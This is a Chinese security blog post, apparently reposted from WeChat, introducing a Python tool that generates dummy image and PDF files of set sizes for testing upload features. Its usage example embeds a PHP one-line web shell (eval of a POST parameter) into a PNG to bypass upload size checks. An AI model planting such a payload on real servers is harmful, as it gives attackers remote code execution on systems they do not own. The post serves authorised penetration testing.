1、工具简介
用于测试文件上传的静态文件生成器。可以生成任意字节的 png 文件。
2、内容
在测试期间测试文件上传功能, 可通过此工具生成任意大小的png等文件,有的文件上传功能会限制不同大小的文件进行上传,此工具可方便生成文件进行测试。
安装
由于是用Python实现的,所以可以用pip命令安装。
pip install git+ssh://[email protected]/sterrasec/dummy.git
使用
命令输出以彩色显示。只需指定png、jpeg或pdf的文件路径,就会生成文件。
dummy test.jpeg
使用-t选项可写入指定内容,还可以在使用-b选项生成 png 文件时指定文件中的字节数。若要指定字节,可以使用 B、KB、MB 或 GB 作为单位。
dummy -t <?php @eval($_POST['sahx']);?> -b 1MB sahx.png
使用-h选项查看命令帮助
$ dummy -h
usage: dummy [-h] [-t TEXT] [-b BYTES] file_path
Create a dummy file for testing.
positional arguments:
file_path Path to the generated file(.jpeg, .png, .pdf)
options:
-h, --help show this help message and exit
-t TEXT, --text TEXT Text to be written in the file
-b BYTES, --bytes BYTES
Bytes of file(.png only)
直接可使用命令写入一个图片马并且可指定大小,这对于测试来说很方便,对于有些限制图片大小上传的功能可根据具体大小进行生成图片马。
项目地址:
https://github.com/sterrasec/dummy/
免责声明:
本公众号漏洞复现文章,SRC、渗透测试等文章,仅供学习参考,请勿用于实战!!有授权情况下除外!!由于传播、利用本公众号文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责
原文始发于微信公众号(sahx安全从业记):文件上传静态文件生成工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论